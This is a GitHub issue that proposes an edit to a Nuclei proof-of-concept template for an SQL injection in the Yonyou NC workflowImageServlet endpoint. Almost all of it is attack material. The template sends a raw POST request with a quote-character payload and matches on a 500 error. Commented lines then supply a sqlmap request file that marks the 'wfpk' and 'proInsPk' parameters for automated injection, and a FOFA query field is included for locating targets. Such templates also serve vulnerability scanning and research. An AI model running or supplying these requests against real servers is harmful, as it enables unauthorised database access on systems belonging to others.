### ISSUE TITLE
poc modify: yonyou-nc-workflowImageServlet-sqli

### ISSUE THREAD

**Issue by Tripse** [Co5mos/nuclei-tps#7]
```yaml
id: yonyou-nc-workflowImageServlet-sqli
info:
  name: yonyou-nc-workflowImageServlet-sqli
  author: leadlife
  severity: critical
  description: 用友 NC /workflowImageServlet/doPost 接口存在SQL注入漏洞
  tags: yonyou, sqli
  metadata:
    max-request: 1
    fofa-query: app="todo"
http:
  - raw:
      - |-
        POST /portal/pt/servlet/workflowImageServlet/doPost?pageId=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 18

        wfpk=1'&proInsPk=t
        
    matchers:
      - type: word
        part: header
        words:
          - '500'

# sqlmap -r sqli.txt 
# POST /portal/pt/servlet/workflowImageServlet/doPost?pageId=login HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Content-Length: 45

# wfpk=*&proInsPk=*


```
